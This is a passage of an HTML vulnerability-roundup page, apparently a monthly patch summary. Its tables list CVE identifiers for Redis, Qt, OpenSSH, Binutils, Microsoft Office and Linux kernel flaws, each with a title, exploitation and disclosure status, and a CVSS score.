undefined;'><strong>Title</strong></span></p></td><td><p style="direction: ltr;"><span style='font-size: undefined;'><strong>Exploited?</strong></span></p></td><td><p style="direction: ltr;"><span style='font-size: undefined;'><strong>Publicly disclosed?</strong></span></p></td><td><p style="text-align: right;direction: ltr;"><span style='font-size: undefined;'><strong>CVSSv3 base score</strong></span></p></td></tr><tr><td><p style="direction: ltr;"><a href="https://nvd.nist.gov/vuln/detail/CVE-2025-49844"><span style='font-size: undefined;'>CVE-2025-49844</span></a></p></td><td><p style="direction: ltr;"><span style='font-size: undefined;'>Redis Lua Use-After-Free may lead to remote code execution</span></p></td><td><p style="direction: ltr;"><span style='font-size: undefined;'>No</span></p></td><td><p style="direction: ltr;"><span style='font-size: undefined;'>No</span></p></td><td><p style="text-align: right;direction: ltr;"><span style='font-size: undefined;'>9.9</span></p></td></tr><tr><td><p style="direction: ltr;"><a href="https://nvd.nist.gov/vuln/detail/CVE-2025-10729"><span style='font-size: undefined;'>CVE-2025-10729</span></a></p></td><td><p style="direction: ltr;"><span style='font-size: undefined;'>Use-after-free vulnerability in Qt SVG qsvghandler.cpp allows denial of service via crafted SVG</span></p></td><td><p style="direction: ltr;"><span style='font-size: undefined;'>No</span></p></td><td><p style="direction: ltr;"><span style='font-size: undefined;'>No</span></p></td><td><p style="text-align: right;direction: ltr;"><span style='font-size: undefined;'>9.3</span></p></td></tr><tr><td><p style="direction: ltr;"><a href="https://nvd.nist.gov/vuln/detail/CVE-2025-11234"><span style='font-size: undefined;'>CVE-2025-11234</span></a></p></td><td><p style="direction: ltr;"><span style='font-size: undefined;'>Qemu-kvm: vnc websocket handshake use-after-free</span></p></td><td><p style="direction: ltr;"><span style='font-size: undefined;'>No</span></p></td><td><p style="direction: ltr;"><span style='font-size: undefined;'>No</span></p></td><td><p style="text-align: right;direction: ltr;"><span style='font-size: undefined;'>7.5</span></p></td></tr><tr><td><p style="direction: ltr;"><a href="https://nvd.nist.gov/vuln/detail/CVE-2025-46817"><span style='font-size: undefined;'>CVE-2025-46817</span></a></p></td><td><p style="direction: ltr;"><span style='font-size: undefined;'>Lua library commands may lead to integer overflow and potential RCE</span></p></td><td><p style="direction: ltr;"><span style='font-size: undefined;'>No</span></p></td><td><p style="direction: ltr;"><span style='font-size: undefined;'>No</span></p></td><td><p style="text-align: right;direction: ltr;"><span style='font-size: undefined;'>7</span></p></td></tr><tr><td><p style="direction: ltr;"><a href="https://nvd.nist.gov/vuln/detail/CVE-2025-46819"><span style='font-size: undefined;'>CVE-2025-46819</span></a></p></td><td><p style="direction: ltr;"><span style='font-size: undefined;'>Redis is vulnerable to DoS via specially crafted LUA scripts</span></p></td><td><p style="direction: ltr;"><span style='font-size: undefined;'>No</span></p></td><td><p style="direction: ltr;"><span style='font-size: undefined;'>No</span></p></td><td><p style="text-align: right;direction: ltr;"><span style='font-size: undefined;'>6.3</span></p></td></tr><tr><td><p style="direction: ltr;"><a href="https://nvd.nist.gov/vuln/detail/CVE-2025-46818"><span style='font-size: undefined;'>CVE-2025-46818</span></a></p></td><td><p style="direction: ltr;"><span style='font-size: undefined;'>Redis: Authenticated users can execute LUA scripts as a different user</span></p></td><td><p style="direction: ltr;"><span style='font-size: undefined;'>No</span></p></td><td><p style="direction: ltr;"><span style='font-size: undefined;'>No</span></p></td><td><p style="text-align: right;direction: ltr;"><span style='font-size: undefined;'>6</span></p></td></tr><tr><td><p style="direction: ltr;"><a href="https://nvd.nist.gov/vuln/detail/CVE-2025-61985"><span style='font-size: undefined;'>CVE-2025-61985</span></a></p></td><td><p style="direction: ltr;"><span style='font-size: undefined;'>ssh in OpenSSH before 10.1 allows the '\0' character in an ssh:// URI, potentially leading to code execution when a ProxyCommand is used.</span></p></td><td><p style="direction: ltr;"><span style='font-size: undefined;'>No</span></p></td><td><p style="direction: ltr;"><span style='font-size: undefined;'>No</span></p></td><td><p style="text-align: right;direction: ltr;"><span style='font-size: undefined;'>4.5</span></p></td></tr><tr><td><p style="direction: ltr;"><a href="https://nvd.nist.gov/vuln/detail/CVE-2025-8291"><span style='font-size: undefined;'>CVE-2025-8291</span></a></p></td><td><p style="direction: ltr;"><span style='font-size: undefined;'>ZIP64 End of Central Directory (EOCD) Locator record offset not checked</span></p></td><td><p style="direction: ltr;"><span style='font-size: undefined;'>No</span></p></td><td><p style="direction: ltr;"><span style='font-size: undefined;'>No</span></p></td><td><p style="text-align: right;direction: ltr;"><span style='font-size: undefined;'>4.3</span></p></td></tr><tr><td><p style="direction: ltr;"><a href="https://nvd.nist.gov/vuln/detail/CVE-2025-61984"><span style='font-size: undefined;'>CVE-2025-61984</span></a></p></td><td><p style="direction: ltr;"><span style='font-size: undefined;'>ssh in OpenSSH before 10.1 allows control characters in usernames that originate from certain possibly untrusted sources, potentially leading to code execution when a ProxyCommand is used. The untrusted sources are the command line and %-sequence expansion of a configuration file. (A configuration file that provides a complete literal username is not categorized as an untrusted source.)</span></p></td><td><p style="direction: ltr;"><span style='font-size: undefined;'>No</span></p></td><td><p style="direction: ltr;"><span style='font-size: undefined;'>No</span></p></td><td><p style="text-align: right;direction: ltr;"><span style='font-size: undefined;'>3.6</span></p></td></tr><tr><td><p style="direction: ltr;"><a href="https://nvd.nist.gov/vuln/detail/CVE-2025-11414"><span style='font-size: undefined;'>CVE-2025-11414</span></a></p></td><td><p style="direction: ltr;"><span style='font-size: undefined;'>GNU Binutils Linker elflink.c get_link_hash_entry out-of-bounds</span></p></td><td><p style="direction: ltr;"><span style='font-size: undefined;'>No</span></p></td><td><p style="direction: ltr;"><span style='font-size: undefined;'>No</span></p></td><td><p style="text-align: right;direction: ltr;"><span style='font-size: undefined;'>3.3</span></p></td></tr><tr><td><p style="direction: ltr;"><a href="https://nvd.nist.gov/vuln/detail/CVE-2025-11413"><span style='font-size: undefined;'>CVE-2025-11413</span></a></p></td><td><p style="direction: ltr;"><span style='font-size: undefined;'>GNU Binutils Linker elflink.c elf_link_add_object_symbols out-of-bounds</span></p></td><td><p style="direction: ltr;"><span style='font-size: undefined;'>No</span></p></td><td><p style="direction: ltr;"><span style='font-size: undefined;'>No</span></p></td><td><p style="text-align: right;direction: ltr;"><span style='font-size: undefined;'>3.3</span></p></td></tr><tr><td><p style="direction: ltr;"><a href="https://nvd.nist.gov/vuln/detail/CVE-2025-11412"><span style='font-size: undefined;'>CVE-2025-11412</span></a></p></td><td><p style="direction: ltr;"><span style='font-size: undefined;'>GNU Binutils Linker elflink.c bfd_elf_gc_record_vtentry out-of-bounds</span></p></td><td><p style="direction: ltr;"><span style='font-size: undefined;'>No</span></p></td><td><p style="direction: ltr;"><span style='font-size: undefined;'>No</span></p></td><td><p style="text-align: right;direction: ltr;"><span style='font-size: undefined;'>3.3</span></p></td></tr><tr><td><p style="direction: ltr;"><a href="https://nvd.nist.gov/vuln/detail/CVE-2025-11495"><span style='font-size: undefined;'>CVE-2025-11495</span></a></p></td><td><p style="direction: ltr;"><span style='font-size: undefined;'>GNU Binutils Linker elf64-x86-64.c elf_x86_64_relocate_section heap-based overflow</span></p></td><td><p style="direction: ltr;"><span style='font-size: undefined;'>No</span></p></td><td><p style="direction: ltr;"><span style='font-size: undefined;'>No</span></p></td><td><p style="text-align: right;direction: ltr;"><span style='font-size: undefined;'>3.3</span></p></td></tr><tr><td><p style="direction: ltr;"><a href="https://nvd.nist.gov/vuln/detail/CVE-2025-10728"><span style='font-size: undefined;'>CVE-2025-10728</span></a></p></td><td><p style="direction: ltr;"><span style='font-size: undefined;'>Uncontrolled recursion in Qt SVG module</span></p></td><td><p style="direction: ltr;"><span style='font-size: undefined;'>No</span></p></td><td><p style="direction: ltr;"><span style='font-size: undefined;'>No</span></p></td><td><p style="text-align: right;direction: ltr;"><span style='font-size: undefined;'>N/A</span></p></td></tr></tbody></table><h3 style="direction: ltr;"><strong>Microsoft Office vulnerabilities</strong></h3><table><colgroup data-width='1250'><col style="width:14.102564102564102%"/><col style="width:38.141025641025635%"/><col style="width:13.782051282051283%"/><col style="width:17.467948717948715%"/><col style="width:16.506410256410255%"/></colgroup><tbody><tr><td><p style="direction: ltr;"><span style='font-size: undefined;'><strong>CVE</strong></span></p></td><td><p style="direction: ltr;"><span style='font-size: undefined;'><strong>Title</strong></span></p></td><td><p style="direction: ltr;"><span style='font-size: undefined;'><strong>Exploited?</strong></span></p></td><td><p style="direction: ltr;"><span style='font-size: undefined;'><strong>Publicly disclosed?</strong></span></p></td><td><p style="text-align: right;direction: ltr;"><span style='font-size: undefined;'><strong>CVSSv3 base score</strong></span></p></td></tr><tr><td><p style="direction: ltr;"><a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2025-59228"><span style='font-size: undefined;'>CVE-2025-59228</span></a></p></td><td><p style="direction: ltr;"><span style='font-size: undefined;'>Microsoft SharePoint Remote Code Execution Vulnerability</span></p></td><td><p style="direction: ltr;"><span style='font-size: undefined;'>No</span></p></td><td><p style="direction: ltr;"><span style='font-size: undefined;'>No</span></p></td><td><p style="text-align: right;direction: ltr;"><span style='font-size: undefined;'>8.8</span></p></td></tr><tr><td><p style="direction: ltr;"><a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2025-59237"><span style='font-size: undefined;'>CVE-2025-59237</span></a></p></td><td><p style="direction: ltr;"><span style='font-size: undefined;'>Microsoft SharePoint Remote Code Execution Vulnerability</span></p></td><td><p style="direction: ltr;"><span style='font-size: undefined;'>No</span></p></td><td><p style="direction: ltr;"><span style='font-size: undefined;'>No</span></p></td><td><p style="text-align: right;direction: ltr;"><span style='font-size: undefined;'>8.8</span></p></td></tr><tr><td><p style="direction: ltr;"><a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2025-59236"><span style='font-size: undefined;'>CVE-2025-59236</span></a></p></td><td><p style="direction: ltr;"><span style='font-size: undefined;'>Microsoft Excel Remote Code Execution Vulnerability</span></p></td><td><p style="direction: ltr;"><span style='font-size: undefined;'>No</span></p></td><td><p style="direction: ltr;"><span style='font-size: undefined;'>No</span></p></td><td><p style="text-align: right;direction: ltr;"><span style='font-size: undefined;'>8.4</span></p></td></tr><tr><td><p style="direction: ltr;"><a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2025-59222"><span style='font-size: undefined;'>CVE-2025-59222</span></a></p></td><td><p style="direction: ltr;"><span style='font-size: undefined;'>Microsoft Word Remote Code Execution Vulnerability</span></p></td><td><p style="direction: ltr;"><span style='font-size: undefined;'>No</span></p></td><td><p style="direction: ltr;"><span style='font-size: undefined;'>No</span></p></td><td><p style="text-align: right;direction: ltr;"><span style='font-size: undefined;'>7.8</span></p></td></tr><tr><td><p style="direction: ltr;"><a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2025-59238"><span style='font-size: undefined;'>CVE-2025-59238</span></a></p></td><td><p style="direction: ltr;"><span style='font-size: undefined;'>Microsoft PowerPoint Remote Code Execution Vulnerability</span></p></td><td><p style="direction: ltr;"><span style='font-size: undefined;'>No</span></p></td><td><p style="direction: ltr;"><span style='font-size: undefined;'>No</span></p></td><td><p style="text-align: right;direction: ltr;"><span style='font-size: undefined;'>7.8</span></p></td></tr><tr><td><p style="direction: ltr;"><a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2025-59226"><span style='font-size: undefined;'>CVE-2025-59226</span></a></p></td><td><p style="direction: ltr;"><span style='font-size: undefined;'>Microsoft Office Visio Remote Code Execution Vulnerability</span></p></td><td><p style="direction: ltr;"><span style='font-size: undefined;'>No</span></p></td><td><p style="direction: ltr;"><span style='font-size: undefined;'>No</span></p></td><td><p style="text-align: right;direction: ltr;"><span style='font-size: undefined;'>7.8</span></p></td></tr><tr><td><p style="direction: ltr;"><a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2025-59234"><span style='font-size: undefined;'>CVE-2025-59234</span></a></p></td><td><p style="direction: ltr;"><span style='font-size: undefined;'>Microsoft Office Remote Code Execution Vulnerability</span></p></td><td><p style="direction: ltr;"><span style='font-size: undefined;'>No</span></p></td><td><p style="direction: ltr;"><span style='font-size: undefined;'>No</span></p></td><td><p style="text-align: right;direction: ltr;"><span style='font-size: undefined;'>7.8</span></p></td></tr><tr><td><p style="direction: ltr;"><a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2025-59227"><span style='font-size: undefined;'>CVE-2025-59227</span></a></p></td><td><p style="direction: ltr;"><span style='font-size: undefined;'>Microsoft Office Remote Code Execution Vulnerability</span></p></td><td><p style="direction: ltr;"><span style='font-size: undefined;'>No</span></p></td><td><p style="direction: ltr;"><span style='font-size: undefined;'>No</span></p></td><td><p style="text-align: right;direction: ltr;"><span style='font-size: undefined;'>7.8</span></p></td></tr><tr><td><p style="direction: ltr;"><a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2025-59231"><span style='font-size: undefined;'>CVE-2025-59231</span></a></p></td><td><p style="direction: ltr;"><span style='font-size: undefined;'>Microsoft Excel Remote Code Execution Vulnerability</span></p></td><td><p style="direction: ltr;"><span style='font-size: undefined;'>No</span></p></td><td><p style="direction: ltr;"><span style='font-size: undefined;'>No</span></p></td><td><p style="text-align: right;direction: ltr;"><span style='font-size: undefined;'>7.8</span></p></td></tr><tr><td><p style="direction: ltr;"><a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2025-59233"><span style='font-size: undefined;'>CVE-2025-59233</span></a></p></td><td><p style="direction: ltr;"><span style='font-size: undefined;'>Microsoft Excel Remote Code Execution Vulnerability</span></p></td><td><p style="direction: ltr;"><span style='font-size: undefined;'>No</span></p></td><td><p style="direction: ltr;"><span style='font-size: undefined;'>No</span></p></td><td><p style="text-align: right;direction: ltr;"><span style='font-size: undefined;'>7.8</span></p></td></tr><tr><td><p style="direction: ltr;"><a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2025-59243"><span style='font-size: undefined;'>CVE-2025-59243</span></a></p></td><td><p style="direction: ltr;"><span style='font-size: undefined;'>Microsoft Excel Remote Code Execution Vulnerability</span></p></td><td><p style="direction: ltr;"><span style='font-size: undefined;'>No</span></p></td><td><p style="direction: ltr;"><span style='font-size: undefined;'>No</span></p></td><td><p style="text-align: right;direction: ltr;"><span style='font-size: undefined;'>7.8</span></p></td></tr><tr><td><p style="direction: ltr;"><a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2025-59223"><span style='font-size: undefined;'>CVE-2025-59223</span></a></p></td><td><p style="direction: ltr;"><span style='font-size: undefined;'>Microsoft Excel Remote Code Execution Vulnerability</span></p></td><td><p style="direction: ltr;"><span style='font-size: undefined;'>No</span></p></td><td><p style="direction: ltr;"><span style='font-size: undefined;'>No</span></p></td><td><p style="text-align: right;direction: ltr;"><span style='font-size: undefined;'>7.8</span></p></td></tr><tr><td><p style="direction: ltr;"><a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2025-59224"><span style='font-size: undefined;'>CVE-2025-59224</span></a></p></td><td><p style="direction: ltr;"><span style='font-size: undefined;'>Microsoft Excel Remote Code Execution Vulnerability</span></p></td><td><p style="direction: ltr;"><span style='font-size: undefined;'>No</span></p></td><td><p style="direction: ltr;"><span style='font-size: undefined;'>No</span></p></td><td><p style="text-align: right;direction: ltr;"><span style='font-size: undefined;'>7.8</span></p></td></tr><tr><td><p style="direction: ltr;"><a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2025-59225"><span style='font-size: undefined;'>CVE-2025-59225</span></a></p></td><td><p style="direction: ltr;"><span style='font-size: undefined;'>Microsoft Excel Remote Code Execution Vulnerability</span></p></td><td><p style="direction: ltr;"><span style='font-size: undefined;'>No</span></p></td><td><p style="direction: ltr;"><span style='font-size: undefined;'>No</span></p></td><td><p style="text-align: right;direction: ltr;"><span style='font-size: undefined;'>7.8</span></p></td></tr><tr><td><p style="direction: ltr;"><a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2025-59235"><span style='font-size: undefined;'>CVE-2025-59235</span></a></p></td><td><p style="direction: ltr;"><span style='font-size: undefined;'>Microsoft Excel Information Disclosure Vulnerability</span></p></td><td><p style="direction: ltr;"><span style='font-size: undefined;'>No</span></p></td><td><p style="direction: ltr;"><span style='font-size: undefined;'>No</span></p></td><td><p style="text-align: right;direction: ltr;"><span style='font-size: undefined;'>7.1</span></p></td></tr><tr><td><p style="direction: ltr;"><a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2025-59232"><span style='font-size: undefined;'>CVE-2025-59232</span></a></p></td><td><p style="direction: ltr;"><span style='font-size: undefined;'>Microsoft Excel Information Disclosure Vulnerability</span></p></td><td><p style="direction: ltr;"><span style='font-size: undefined;'>No</span></p></td><td><p style="direction: ltr;"><span style='font-size: undefined;'>No</span></p></td><td><p style="text-align: right;direction: ltr;"><span style='font-size: undefined;'>7.1</span></p></td></tr><tr><td><p style="direction: ltr;"><a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2025-59221"><span style='font-size: undefined;'>CVE-2025-59221</span></a></p></td><td><p style="direction: ltr;"><span style='font-size: undefined;'>Microsoft Word Remote Code Execution Vulnerability</span></p></td><td><p style="direction: ltr;"><span style='font-size: undefined;'>No</span></p></td><td><p style="direction: ltr;"><span style='font-size: undefined;'>No</span></p></td><td><p style="text-align: right;direction: ltr;"><span style='font-size: undefined;'>7</span></p></td></tr><tr><td><p style="direction: ltr;"><a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2025-59229"><span style='font-size: undefined;'>CVE-2025-59229</span></a></p></td><td><p style="direction: ltr;"><span style='font-size: undefined;'>Microsoft Office Denial of Service Vulnerability</span></p></td><td><p style="direction: ltr;"><span style='font-size: undefined;'>No</span></p></td><td><p style="direction: ltr;"><span style='font-size: undefined;'>No</span></p></td><td><p style="text-align: right;direction: ltr;"><span style='font-size: undefined;'>5.5</span></p></td></tr></tbody></table><p></p><p></p><h3 style="direction: ltr;"><strong>Open Source Software vulnerabilities</strong></h3><table><colgroup data-width='1250'><col style="width:10.56%"/><col style="width:47.839999999999996%"/><col style="width:13.76%"/><col style="width:14.719999999999999%"/><col style="width:13.120000000000001%"/></colgroup><tbody><tr><td><p style="direction: ltr;"><span style='font-size: undefined;'><strong>CVE</strong></span></p></td><td><p style="direction: ltr;"><span style='font-size: undefined;'><strong>Title</strong></span></p></td><td><p style="direction: ltr;"><span style='font-size: undefined;'><strong>Exploited?</strong></span></p></td><td><p style="direction: ltr;"><span style='font-size: undefined;'><strong>Publicly disclosed?</strong></span></p></td><td><p style="text-align: right;direction: ltr;"><span style='font-size: undefined;'><strong>CVSSv3 base score</strong></span></p></td></tr><tr><td><p style="direction: ltr;"><a href="https://nvd.nist.gov/vuln/detail/CVE-2025-39907"><span style='font-size: undefined;'>CVE-2025-39907</span></a></p></td><td><p style="direction: ltr;"><span style='font-size: undefined;'>mtd: rawnand: stm32_fmc2: avoid overlapping mappings on ECC buffer</span></p></td><td><p style="direction: ltr;"><span style='font-size: undefined;'>No</span></p></td><td><p style="direction: ltr;"><span style='font-size: undefined;'>No</span></p></td><td><p style="text-align: right;direction: ltr;"><span style='font-size: undefined;'>9.8</span></p></td></tr><tr><td><p style="direction: ltr;"><a href="https://nvd.nist.gov/vuln/detail/CVE-2025-39910"><span style='font-size: undefined;'>CVE-2025-39910</span></a></p></td><td><p style="direction: ltr;"><span style='font-size: undefined;'>mm/vmalloc, mm/kasan: respect gfp mask in kasan_populate_vmalloc()</span></p></td><td><p style="direction: ltr;"><span style='font-size: undefined;'>No</span></p></td><td><p style="direction: ltr;"><span style='font-size: undefined;'>No</span></p></td><td><p style="text-align: right;direction: ltr;"><span style='font-size: undefined;'>9.8</span></p></td></tr><tr><td><p style="direction: ltr;"><a href="https://nvd.nist.gov/vuln/detail/CVE-2025-39943"><span style='font-size: undefined;'>CVE-2025-39943</span></a></p></td><td><p style="direction: ltr;"><span style='font-size: undefined;'>ksmbd: smbdirect: validate data_offset and data_length field of smb_direct_data_transfer</span></p></td><td><p style="direction: ltr;"><span style='font-size: undefined;'>No</span></p></td><td><p style="direction: ltr;"><span style='font-size: undefined;'>No</span></p></td><td><p style="text-align: right;direction: ltr;"><span style='font-size: undefined;'>9.8</span></p></td></tr><tr><td><p style="direction: ltr;"><a href="https://nvd.nist.gov/vuln/detail/CVE-2025-39898"><span style='font-size: undefined;'>CVE-2025-39898</span></a></p></td><td><p style="direction: ltr;"><span style='font-size: undefined;'>e1000e: fix heap overflow in e1000_set_eeprom</span></p></td><td><p style="direction: ltr;"><span style='font-size: undefined;'>No</span></p></td><td><p style="direction: ltr;"><span style='font-size: undefined;'>No</span></p></td><td><p style="text-align: right;direction: ltr;"><span style='font-size: undefined;'>9.8</span></p></td></tr><tr><td><p style="direction: ltr;"><a href="https://nvd.nist.gov/vuln/detail/CVE-2025-39925"><span style='font-size: undefined;'>CVE-2025-39925</span></a></p></td><td><p style="direction: ltr;"><span style='font-size: undefined;'>can: j1939: implement NETDEV_UNREGISTER notification handler</span></p></td><td><p style="direction: ltr;"><span style='font-size: undefined;'>No</span></p></td><td><p style="direction: ltr;"><span style='font-size: undefined;'>No</span></p></td><td><p style="text-align: right;direction: ltr;"><span style='font-size: undefined;'>9.8</span></p></td></tr><tr><td><p style="direction: ltr;"><a href="https://nvd.nist.gov/vuln/detail/CVE-2025-39952"><span style='font-size: undefined;'>CVE-2025-39952</span></a></p></td><td><p style="direction: ltr;"><span style='font-size: undefined;'>wifi: wilc1000: avoid buffer overflow in WID string configuration</span></p></td><td><p style="direction: ltr;"><span style='font-size: undefined;'>No</span></p></td><td><p style="direction: ltr;"><span style='font-size: undefined;'>No</span></p></td><td><p style="text-align: right;direction: ltr;"><span style='font-size: undefined;'>7.8</span></p></td></tr><tr><td><p style="direction: ltr;"><a href="https://nvd.nist.gov/vuln/detail/CVE-2025-39944"><span style='font-size: undefined;'>CVE-2025-39944</span></a></p></td><td><p style="direction: ltr;"><span style='font-size: undefined;'>octeontx2-pf: Fix use-after-free bugs in otx2_sync_tstamp()</span></p></td><td><p style="direction: ltr;"><span style='font-size: undefined;'>No</span></p></td><td><p style="direction: ltr;"><span style='font-size: undefined;'>No</span></p></td><td><p style="text-align: right;direction: ltr;"><span style='font-size: undefined;'>7.8</span></p></td></tr><tr><td><p style="direction: ltr;"><a href="https://nvd.nist.gov/vuln/detail/CVE-2025-39945"><span style='font-size: undefined;'>CVE-2025-39945</span></a></p></td><td><p style="direction: ltr;"><span style='font-size: undefined;'>cnic: Fix use-after-free bugs in cnic_delete_task</span></p></td><td><p style="direction: ltr;"><span style='font-size: undefined;'>No</span></p></td><td><p style="direction: ltr;"><span style='font-size: undefined;'>No</span></p></td><td><p style="text-align: right;direction: ltr;"><span style='font-size: undefined;'>7.8</span></p></td></tr><tr><td><p style="direction: ltr;"><a href="https://nvd.nist.gov/vuln/detail/CVE-2025-39955"><span style='font-size: undefined;'>CVE-2025-39955</span></a></p></td><td><p style="direction: ltr;"><span style='font-size: undefined;'>tcp: Clear tcp_sk(sk)-&gt;fastopen_rsk in tcp_disconnect().</span></p></td><td><p style="direction: ltr;"><span style='font-size: undefined;'>No</span></p></td><td><p style="direction: ltr;"><span style='font-size: undefined;'>No</span></p></td><td><p style="text-align: right;direction: ltr;"><span style='font-size: undefined;'>7.1</span></p></td></tr><tr><td><p style="direction: ltr;"><a href="https://nvd.nist.gov/vuln/detail/CVE-2025-39905"><span style='font-size: undefined;'>CVE-2025-39905</span></a></p></td><td><p style="direction: ltr;"><span style='font-size: undefined;'>net: phylink: add lock for serializing concurrent pl-&gt;phydev writes with resolver</span></p></td><td><p style="direction: ltr;"><span style='font-size: undefined;'>No</span></p></td><td><p style="direction: ltr;"><span style='font-size: undefined;'>No</span></p></td><td><p style="text-align: right;direction: ltr;"><span style='font-size: undefined;'>7.1</span></p></td></tr><tr><td><p style="direction: ltr;"><a href="https://nvd.nist.gov/vuln/detail/CVE-2025-39901"><span style='font-size: undefined;'>CVE-2025-39901</span></a></p></td><td><p style="direction: ltr;"><span style='font-size: undefined;'>i40e: remove read access to debugfs files</span></p></td><td><p style="direction: ltr;"><span style='font-size: undefined;'>No</span></p></td><td><p style="direction: ltr;"><span style='font-size: undefined;'>No</span></p></td><td><p style="text-align: right;direction: ltr;"><span style='font-size: undefined;'>7.1</span></p></td></tr><tr><td><p style="direction: ltr;"><a href="https://nvd.nist.gov/vuln/detail/CVE-2023-53469"><span style='font-size: undefined;'>CVE-2023-53469</span></a></p></td><td><p style="direction: ltr;"><span style='font-size: undefined;'>af_unix: Fix null-ptr-deref in unix_stream_sendpage().</span></p></td><td><p style="direction: ltr;"><span style='font-size: undefined;'>No</span></p></td><td><p style="direction: ltr;"><span style='font-size: undefined;'>No</span></p></td><td><p style="text-align: right;direction: ltr;"><span style='font-size: undefined;'>7.1</span></p></td></tr><tr><td><p style="direction: ltr;"><a href="https://nvd.nist.gov/vuln/detail/CVE-2025-39913"><span style='font-size: undefined;'>CVE-2025-39913</span></a></p></td><td><p style="direction: ltr;"><span style='font-size: undefined;'>tcp_bpf: Call sk_msg_free() when tcp_bpf_send_verdict() fails to allocate psock-&gt;cork.</span></p></td><td><p style="direction: ltr;"><span style='font-size: undefined;'>No</span></p></td><td><p style="direction: ltr;"><span style='font-size: undefined;'>No</span></p></td><td><p style="text-align: right;direction: ltr;"><span style='font-size: undefined;'>6.6</span></p></td></tr><tr><td><p style="direction: ltr;"><a href="https://nvd.nist.gov/vuln/detail/CVE-2025-39951"><span style='font-size: undefined;'>CVE-2025-39951</span></a></p></td><td><p style="direction: ltr;"><span style='font-size: undefined;'>um: virtio_uml: Fix use-after-free after put_device in probe</span></p></td><td><p style="direction: ltr;"><span style='font-size: undefined;'>No</span></p></td><td><p style="direction: ltr;"><span style='font-size: undefined;'>No</span></p></td><td><p style="text-align: right;direction: ltr;"><span style='font-size: undefined;'>6.1</span></p></td></tr><tr><td><p style="direction: ltr;"><a href="https://nvd.nist.gov/vuln/detail/CVE-2025-39940"><span style='font-size: undefined;'>CVE-2025-39940</span></a></p></td><td><p style="direction: ltr;"><span style='font-size: undefined;'>dm-stripe: fix a possible integer overflow</span></p></td><td><p style="direction: ltr;"><span style='font-size: undefined;'>No</span></p></td><td><p style="direction: ltr;"><span style='font-size: undefined;'>No</span></p></td><td><p style="text-align: right;direction: ltr;"><span style='font-size: undefined;'>6.1</span></p></td></tr><tr><td><p style="direction: ltr;"><a href="https://nvd.nist.gov/vuln/detail/CVE-2025-39961"><span style='font-size: undefined;'>CVE-2025-39961</span></a></p></td><td><p style="direction: ltr;"><span style='font-size: undefined;'>iommu/amd/pgtbl: Fix possible race while increase page table level</span></p></td><td><p style="direction: ltr;"><span style='font-size: undefined;'>No</span></p></td><td><p style="direction: ltr;"><span style='font-size: undefined;'>No</span></p></td><td><p style="text-align: right;direction: ltr;"><span style='font-size: undefined;'>5.8</span></p></td></tr><tr><td><p style="direction: ltr;"><a href="https://nvd.nist.gov/vuln/detail/CVE-2025-37727"><span style='font-size: undefined;'>CVE-2025-37727</span></a></p></td><td><p style="direction: ltr;"><span style='font-size: undefined;'>Elasticsearch Insertion of sensitive information in log file</span></p></td><td><p style="direction: ltr;"><span style='font-size: undefined;'>No</span></p></td><td><p style="direction: ltr;"><span style='font-size: undefined;'>No</span></p></td><td><p style="text-align: right;direction: ltr;"><span style='font-size: undefined;'>5.7</span></p></td></tr><tr><td><p style="direction: ltr;"><a href="https://nvd.nist.gov/vuln/detail/CVE-2025-39891"><span style='font-size: undefined;'>CVE-2025-39891</span></a></p></td><td><p style="direction: ltr;"><span style='font-size: undefined;'>wifi: mwifiex: Initialize the chan_stats array to zero</span></p></td><td><p style="direction: ltr;"><span style='font-size: undefined;'>No</span></p></td><td><p style="direction: ltr;"><span style='font-size: undefined;'>No</span></p></td><td><p style="text-align: right;direction: ltr;"><span style='font-size: undefined;'>5.5</span></p></td></tr><tr><td><p style="direction: ltr;"><a href="https://nvd.nist.gov/vuln/detail/CVE-2025-39914"><span style='font-size: undefined;'>CVE-2025-39914</span></a></p></td><td><p style="direction: ltr;"><span style='font-size: undefined;'>tracing: Silence warning when chunk allocation fails in trace_pid_write</span></p></td><td><p style="direction: ltr;"><span style='font-size: undefined;'>No</span></p></td><td><p style="direction: ltr;"><span style='font-size: undefined;'>No</span></p></td><td><p style="text-align: right;direction: ltr;"><span style='font-size: undefined;'>5.5</span></p></td></tr><tr><td><p style="direction: ltr;"><a href="https://nvd.nist.gov/vuln/detail/CVE-2025-39946"><span style='font-size: undefined;'>CVE-2025-39946</span></a></p></td><td><p style="direction: ltr;"><span style='font-size: undefined;'>tls: make sure to abort the stream if headers are bogus</span></p></td><td><p style="direction: ltr;"><span style='font-size: undefined;'>No</span></p></td><td><p style="direction: ltr;"><span style='font-size: undefined;'>No</span></p></td><td><p style="text-align: right;direction: ltr;"><span style='font-size: undefined;'>5.5</span></p></td></tr><tr><td><p style="direction: ltr;"><a href="https://nvd.nist.gov/vuln/detail/CVE-2025-39932"><span style='font-size: undefined;'>CVE-2025-39932</span></a></p></td><td><p style="direction: ltr;"><span style='font-size: undefined;'>smb: client: let smbd_destroy() call disable_work_sync(&info-&gt;post_send_credits_work)</span></p></td><td><p style="direction: ltr;"><span style='font-size: undefined;'>No</span></p></td><td><p style="direction: ltr;"><span style='font-size: undefined;'>No</span></p></td><td><p style="text-align: right;direction: ltr;"><span style='font-size: undefined;'>5.5</span></p></td></tr><tr><td><p style="direction: ltr;"><a href="https://nvd.nist.gov/vuln/detail/CVE-2025-39933"><span style='font-size: undefined;'>CVE-2025-39933</span></a></p></td><td><p style="direction: ltr;"><span style='font-size: undefined;'>smb: client: let recv_done verify data_offset, data_length and remaining_data_length</span></p></td><td><p style="direction: ltr;"><span style='font-size: undefined;'>No</span></p></td><td><p style="direction: ltr;"><span style='font-size: undefined;'>No</span></p></td><td><p 